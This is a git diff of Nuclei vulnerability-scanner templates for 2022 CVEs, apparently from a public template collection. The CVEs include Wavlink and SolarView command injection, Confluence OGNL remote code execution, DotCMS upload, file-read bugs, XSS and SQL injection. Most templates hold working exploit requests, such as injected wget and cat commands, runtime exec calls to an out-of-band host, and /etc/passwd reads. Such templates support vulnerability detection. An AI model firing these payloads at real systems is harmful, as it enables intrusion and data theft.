https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - https://vuldb.com/?id.204537 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2486 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2486 cwe-id: CWE-78 + epss-score: 0.97375 + epss-percentile: 0.99887 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast -requests: + +http: - raw: - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: status status: - 500 +# digest: 4a0a0047304502206d4aca9ab8268d394d35bdb9fc196da5d58d60e950b0dd01e1a15ea6b0182d7e022100b29fb103ac088880efc4bbf33bb823a5c75d7597d46f4b54f34541b0878aa641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-2487.yaml b/poc/cve/CVE-2022-2487.yaml index 7e44310508..899076eb8b 100644 --- a/poc/cve/CVE-2022-2487.yaml +++ b/poc/cve/CVE-2022-2487.yaml @@ -1,37 +1,26 @@ id: CVE-2022-2487 - info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection + name: Wavlink Nightled.cgi - Remote Code Execution author: For3stCo1d severity: critical description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - https://vuldb.com/?id.204538 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2487 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.97419 - epss-percentile: 0.99917 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" - -http: +requests: - raw: - | @timeout: 10s @@ -40,7 +29,6 @@ http: Content-Type: application/x-www-form-urlencoded page=night_led&start_hour=;{{cmd}}; - matchers-condition: and matchers: - type: word @@ -48,14 +36,7 @@ http: words: - "uid=" - "gid=" - - "nightStart" condition: and - - - type: word - words: - - text/html - - type: status status: - 200 -# digest: 490a0046304402207f00334b2f5d0c361a6b2ff01119f94144ec181f8e092351ee454be79f474a9502204a45c0633a005068fee451a63fa604d3bfebbae5409461dcd2b665097635acb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-24899.yaml b/poc/cve/CVE-2022-24899.yaml index a31d7db7e6..f5827141b0 100644 --- a/poc/cve/CVE-2022-24899.yaml +++ b/poc/cve/CVE-2022-24899.yaml @@ -1,38 +1,26 @@ id: CVE-2022-24899 - info: - name: Contao <4.13.3 - Cross-Site Scripting + name: Contao 4.13.2 - Cross-Site Scripting (XSS) author: ritikchaddha severity: medium description: | - Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. - remediation: As a workaround, users may disable canonical tags in the root page settings. + Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings. reference: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 - - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html - - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24899 cwe-id: CWE-79 - epss-score: 0.00342 - epss-percentile: 0.68354 - cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: contao - product: contao shodan-query: title:"Contao" - tags: cve,cve2022,contao,xss,huntr - -http: + tags: cve,cve2022,contao,xss +requests: - method: GET path: - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word @@ -41,9 +29,7 @@ http: - '"></script><script>alert(document.domain)</script>' - '"Not authenticated"' condition: and - - type: word part: header words: - text/html -# digest: 490a0046304402206e8212c2043ed4a8b88abd42a101c0d8c045fb5afddc911efa265f7eeee23ef5022020bd3e5c6e004eece668575a900995776f0edf3c543befd401df3f0c2ca12931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-25323.yaml b/poc/cve/CVE-2022-25323.yaml index 4b47492607..ddcbfa8506 100644 --- a/poc/cve/CVE-2022-25323.yaml +++ b/poc/cve/CVE-2022-25323.yaml @@ -1,48 +1,24 @@ id: CVE-2022-25323 - info: - name: ZEROF Web Server 2.0 - Cross-Site Scripting + name: ZEROF Web Server 2.0 XSS author: pikpikcu severity: medium - description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. + description: ZEROF Web Server 2.0 allows /admin.back XSS. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - - https://awillix.ru - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-25323 - cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.4506 - cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zerof - product: web_server tags: xss,cve,cve2022,zerof - -http: +requests: - method: GET path: - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" - matchers-condition: and matchers: - type: word part: body words: - 'back<img src=x onerror=alert(document.domain)>' - - - type: word - part: header - words: - - "text/html" - + condition: and - type: status status: - 401 -# digest: 490a00463044022067003ec38ecd09853a1a4899f61e6e1891110689b6b77815a59b87f193953942022039897fdefbc83fe10328ffb00b72f367e7f4eff4e140421b1b0777bba83badf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-26134.yaml b/poc/cve/CVE-2022-26134.yaml index 0495a8c0a8..0f5e4c501b 100644 --- a/poc/cve/CVE-2022-26134.yaml +++ b/poc/cve/CVE-2022-26134.yaml @@ -1,59 +1,45 @@ id: CVE-2022-26134 - info: name: Confluence - Remote Code Execution author: pdteam,jbertman severity: critical description: | Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. - remediation: | - Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ - https://jira.atlassian.com/browse/CONFSERVER-79016 - - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26134 - cwe-id: CWE-917 - epss-score: 0.97519 - epss-percentile: 0.99985 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + cwe-id: CWE-74 metadata: - verified: true - max-request: 2 - vendor: atlassian - product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: packetstorm,cve,cve2022,confluence,rce,ognl,oast,kev - -http: + verified: "true" + tags: cve,cve2022,confluence,rce,ognl,oast,kev +requests: - method: GET path: - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/" - stop-at-first-match: true - + req-condition: true matchers-condition: or matchers: - type: dsl dsl: - - 'contains(to_lower(header_1), "x-cmd-response:")' - + - 'contains(to_lower(all_headers_1), "x-cmd-response:")' - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(to_lower(response_2), "confluence")' condition: and - extractors: - type: kval + part: header kval: - "x_cmd_response" - part: header -# digest: 4a0a00473045022006affa053c4fcae2976f75d20b0b62a4911ef7a3701f040771944778b3c395d2022100e564ab928fa74f0703e220834147d93af92f273d089e3125f6ec1e860c8f5567:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/07/04 diff --git a/poc/cve/CVE-2022-26135.yaml b/poc/cve/CVE-2022-26135.yaml index f24f3f1cf7..6ec4be4593 100644 --- a/poc/cve/CVE-2022-26135.yaml +++ b/poc/cve/CVE-2022-26135.yaml @@ -1,4 +1,5 @@ id: CVE-2022-26135 + info: name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server author: dk4trin @@ -11,10 +12,12 @@ info: cvss-score: 7.5 cve-id: CVE-2020-14179 tags: cve,cve2022,atlassian,jira,ssrf + requests: - method: GET path: - "{{BaseURL}}/secure/Signup!default.jspa" + matchers-condition: and matchers: - type: word @@ -23,6 +26,7 @@ requests: - "Username" - "Password" condition: and + - type: status status: - 200 diff --git a/poc/cve/CVE-2022-26352.yaml b/poc/cve/CVE-2022-26352.yaml index 5f06544108..f75c2c3155 100644 --- a/poc/cve/CVE-2022-26352.yaml +++ b/poc/cve/CVE-2022-26352.yaml @@ -1,33 +1,18 @@ id: CVE-2022-26352 - info: name: DotCMS - Arbitrary File Upload author: h1ei1 severity: critical description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html - - https://groups.google.com/g/dotcms classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-26352 - cwe-id: CWE-22 - epss-score: 0.97484 - epss-percentile: 0.99966 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: dotcms - product: dotcms - tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive - -http: + tags: cve,cve2022,rce,dotcms +requests: - raw: - | POST /api/content/ HTTP/1.1 @@ -45,7 +30,7 @@ http: - | GET /{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} - + req-condition: true matchers: - type: dsl dsl: @@ -53,4 +38,4 @@ http: - 'status_code_2 == 200' condition: and -# digest: 490a004630440220314e389674d917401154b2b9782e723e24c6d2f9967e7388fc879f3a856976d3022020c28a0202ed288d613d1c0b3179e34945ec911273f4d4266b949ab8ae00f119:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/05/19 diff --git a/poc/cve/CVE-2022-26564.yaml b/poc/cve/CVE-2022-26564.yaml index 96ef0f5d57..f95d08a217 100644 --- a/poc/cve/CVE-2022-26564.yaml +++ b/poc/cve/CVE-2022-26564.yaml @@ -1,41 +1,29 @@ id: CVE-2022-26564 - info: - name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting + name: HotelDruid Hotel Management Software 3.0.3 XSS author: alexrydzak severity: medium description: | - HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. + HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. reference: - https://rydzak.me/2022/04/cve-2022-26564/ - - https://www.hoteldruid.com - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 + - https://www.hoteldruid.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-26564 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40288 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: - max-request: 3 - vendor: digitaldruid - product: hoteldruid shodan-query: http.favicon.hash:-1521640213 tags: cve,cve2022,hoteldruid,xss - -http: +requests: - method: GET path: - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>' - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1' - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>' - stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -44,13 +32,10 @@ http: - "<script>javascript:alert('XSS')</script>" - "HotelDruid" condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4a0a00473045022100fca650ea625815d7f969ec8643ea7f3884ec0a90c370a42ba7eddbd3e61d497a022049c0199716444475c96728c2852b5e3037515cdc0dcda788c85ae44c33f319a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-26960.yaml b/poc/cve/CVE-2022-26960.yaml index 21b4f71879..bf63cdbaa8 100644 --- a/poc/cve/CVE-2022-26960.yaml +++ b/poc/cve/CVE-2022-26960.yaml @@ -1,10 +1,13 @@ id: CVE-2022-26960 + info: name: elFinder <=2.1.60 - Local File Inclusion author: pikpikcu severity: critical description: | elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + remediation: | + Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db @@ -15,22 +18,30 @@ info: cvss-score: 9.1 cve-id: CVE-2022-26960 cwe-id: CWE-22 + epss-score: 0.88417 + epss-percentile: 0.98392 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: std42 + product: elfinder tags: cve,cve2022,lfi,elfinder -requests: + +http: - raw: - | GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/05 +# digest: 4a0a00473045022007974a80e96be3bad230604c73e77300a035917d8157638c79d98a0265875156022100b09af0fedbc3a7a90bf7a837847df6402958020c04abd9325d9da8dab8d14aaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-27927.yaml b/poc/cve/CVE-2022-27927.yaml index 2d123b1139..96820d1ca3 100644 --- a/poc/cve/CVE-2022-27927.yaml +++ b/poc/cve/CVE-2022-27927.yaml @@ -1,50 +1,38 @@ id: CVE-2022-27927 - info: name: Microfinance Management System 1.0 - SQL Injection author: lucasljm2001,ekrause severity: critical description: | Microfinance Management System 1.0 is susceptible to SQL Injection. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip - https://www.exploit-db.com/exploits/50891 - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 - - https://www.sourcecodester.com/php/14822/microfinance-management-system.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-27927 cwe-id: CWE-89 - epss-score: 0.05754 - epss-percentile: 0.92551 - cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: microfinance_management_system_project - product: microfinance_management_system - tags: microfinance,edb,cve,cve2022,sqli + verified: "true" + tags: cve,cve2022,sqli,microfinance variables: num: "999999999" - -http: +requests: - raw: - | GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 -# digest: 490a004630440220464fd4c01065b9bf307cf48002af84c65e941dcc0f8493b08a814af23294b99702204524bc02e881442819d643814da6a51b66f04c1719bf73a1869747bdf519c277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/07/04 diff --git a/poc/cve/CVE-2022-28079.yaml b/poc/cve/CVE-2022-28079.yaml index 8124852465..748df78551 100644 --- a/poc/cve/CVE-2022-28079.yaml +++ b/poc/cve/CVE-2022-28079.yaml @@ -1,26 +1,37 @@ id: CVE-2022-28079 + info: - name: College Management System - SQL Injection + name: College Management System 1.0 - SQL Injection author: ritikchaddha severity: high description: | - College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. + College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 - https://code-projects.org/college-management-system-in-php-with-source-code/ + - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28079 cwe-id: CWE-89 + epss-score: 0.82978 + epss-percentile: 0.9811 + cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: college_management_system_project + product: college_management_system tags: cve,cve2022,sqli,cms,collegemanagement variables: num: "999999999" -requests: + +http: - raw: - | POST /admin/asign-single-student-subjects.php HTTP/1.1 @@ -28,11 +39,14 @@ requests: Content-Type: application/x-www-form-urlencoded submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# + matchers-condition: and matchers: - type: word words: - '{{md5({{num}})}}' + - type: status status: - 302 +# digest: 4a0a00473045022100e382bfbe8f04a47107ddb791cffb7f27bc5de487cc252068d37b77cb6d77a38402200148cd2a65d13065c5e6ea7b22866765374f310b918b808288cd8be7d80c90a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-28080.yaml b/poc/cve/CVE-2022-28080.yaml index 102d3d12c1..dc59377c75 100644 --- a/poc/cve/CVE-2022-28080.yaml +++ b/poc/cve/CVE-2022-28080.yaml @@ -1,34 +1,21 @@ id: CVE-2022-28080 - info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause,ritikchaddha severity: high description: | - Royal Event is vulnerable to a SQL injection vulnerability. - remediation: | - To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. + Detects an SQL Injection vulnerability in Royal Event System reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html + - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - cwe-id: CWE-89 - epss-score: 0.01456 - epss-percentile: 0.85223 - cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: event_management_system_project - product: event_management_system - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms,intrusive - -http: + tags: cve,cve2022,sqli,authenticated,cms,royalevent +requests: - raw: - | POST /royal_event/ HTTP/1.1 @@ -67,14 +54,12 @@ http: 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - + cookie-reuse: true matchers-condition: and matchers: - type: word words: - '{{md5("{{randstr}}")}}' - - type: status status: - 200 -# digest: 490a0046304402206cd10a1971d924c7bf214a8cd866c2ce47e1785ab940f77145d7f2aafa9c1b5602201a445e4a9e6c860516ee225bcf306114571359b98d3f4c4d7b826042ecdaf4fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-29014.yaml b/poc/cve/CVE-2022-29014.yaml index a3ac539646..8d1df858e8 100644 --- a/poc/cve/CVE-2022-29014.yaml +++ b/poc/cve/CVE-2022-29014.yaml @@ -1,31 +1,19 @@ id: CVE-2022-29014 - info: - name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion + name: Razer Sila Gaming Router v2.0.441_api-2.0.418 - LFI author: edoardottt severity: high - description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. - remediation: | - Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. + description: A local file inclusion vulnerability in Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to read arbitrary files. reference: - https://www.exploit-db.com/exploits/50864 - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 - - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila - - https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29014 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29014 - epss-score: 0.79717 - epss-percentile: 0.97981 - cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: razer - product: sila_firmware - tags: edb,packetstorm,cve,cve2022,razer,lfi,router - -http: + tags: cve,cve2022,razer,lfi,router +requests: - raw: - | POST /ubus/ HTTP/1.1 @@ -33,14 +21,11 @@ http: Content-Type: application/x-www-form-urlencoded {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 4b0a00483046022100d681b2f0e48b356fce7028d4357f7e2819d0ed04dedaf9163341c6bb16ac2a55022100d6be2a1ed872e893e30d5f837dab6f346456b0c6194d761ee7148f5e0adc8c71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-29299.yaml b/poc/cve/CVE-2022-29299.yaml index 29d5098d23..7bec163c15 100644 --- a/poc/cve/CVE-2022-29299.yaml +++ b/poc/cve/CVE-2022-29299.yaml @@ -1,13 +1,10 @@ id: CVE-2022-29299 - info: name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting author: For3stCo1d severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. - remediation: | - To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/50967 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 @@ -15,15 +12,12 @@ info: cve-id: CVE-2022-29299 metadata: verified: true - max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb - -http: + tags: cve,cve2022,xss,solarview +requests: - method: GET path: - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' - matchers-condition: and matchers: - type: word @@ -32,14 +26,12 @@ http: - '<script>alert(document.domain)</script><"">' - '/Solar_History.php" METHOD="post">' condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4b0a004830460221009d43ac4959a7325c6f69198d1f4deed2badad16a8b12f0574e86dd9edbb3ee1f02210097baa8089139ece7b77d9102f25d6adfb31f9d4cfaa08609a37e6c9548ca8a01:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs 06/21/2022 diff --git a/poc/cve/CVE-2022-29303.yaml b/poc/cve/CVE-2022-29303.yaml index e4b3983352..ba57eb25d5 100644 --- a/poc/cve/CVE-2022-29303.yaml +++ b/poc/cve/CVE-2022-29303.yaml @@ -1,37 +1,26 @@ id: CVE-2022-29303 - info: name: SolarView Compact 6.00 - OS Command Injection author: badboycxcc severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. - remediation: | - Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50940 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing - - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29303 - cwe-id: CWE-78 - epss-score: 0.9555 - epss-percentile: 0.99216 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + cwe-id: CWE-77 metadata: - verified: true - max-request: 1 - vendor: contec - product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: injection,solarview,edb,packetstorm,cve,cve2022,rce,kev + verified: "true" + tags: cve,cve2022,rce,injection,solarview variables: cmd: "cat${IFS}/etc/passwd" - -http: +requests: - raw: - | @timeout: 25s @@ -40,16 +29,10 @@ http: Content-Type: application/x-www-form-urlencoded mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M - - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" - - type: word - part: body - words: - - "p1_network_mail.cgi" -# digest: 4a0a00473045022100858afb5cdd23bcaf54aed234d7390fb4064452b82219b7a18f3089f8a014d59e02200655e5a73229f5871df0ae04f3a437094964d94da29e64799ed766138a111b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/06/01 diff --git a/poc/cve/CVE-2022-29548.yaml b/poc/cve/CVE-2022-29548.yaml index f6b5e980e8..1a72d103fa 100644 --- a/poc/cve/CVE-2022-29548.yaml +++ b/poc/cve/CVE-2022-29548.yaml @@ -1,37 +1,52 @@ id: CVE-2022-29548 + info: - name: WSO2 Management Console - Reflected XSS + name: WSO2 - Cross-Site Scripting author: edoardottt severity: medium description: | - A reflected XSS issue exists in the Management Console of several WSO2 products. + WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 